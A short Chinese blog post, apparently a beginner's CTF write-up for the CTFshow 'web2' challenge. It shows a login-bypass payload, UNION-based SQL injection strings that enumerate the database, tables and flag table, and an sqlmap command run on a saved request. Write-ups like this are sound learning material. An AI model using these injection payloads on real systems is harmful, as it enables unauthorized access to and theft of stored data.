BUGSHOW WEB2实例
日常开靶机;
直接burpsuits抓包;
这里有两个方法来操作,一个是用sql注入,一个用sqlmap;
首先用SQL注入试试
万能语句试试 admin' or 1=1 ,成功了
扫描一下包含的库名,当然先要看看显示规则!admin' or 1=1 union select 1,2,3#
扫描库名or 1=1 union select 1,database(),3 出来了一个web2的库名...接下来扫表名(不过扫表扫列我还真不熟)
or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema='web2' 扫描web2的表内内容,得到表flag和user
扫描flag表 or 1=1 union select 1,flag,3 from flag
得到了flag
通过sqlmap进行扫描注入点
保存Raw文件
通过sqlmap -r test.txt --dbs扫描
继续扫描表
得到了flag
我是Dixk-BXy,新手上路,转载请注明原文链接:https://www.cnblogs.com/DenZi/articles/web2_ctfshow.html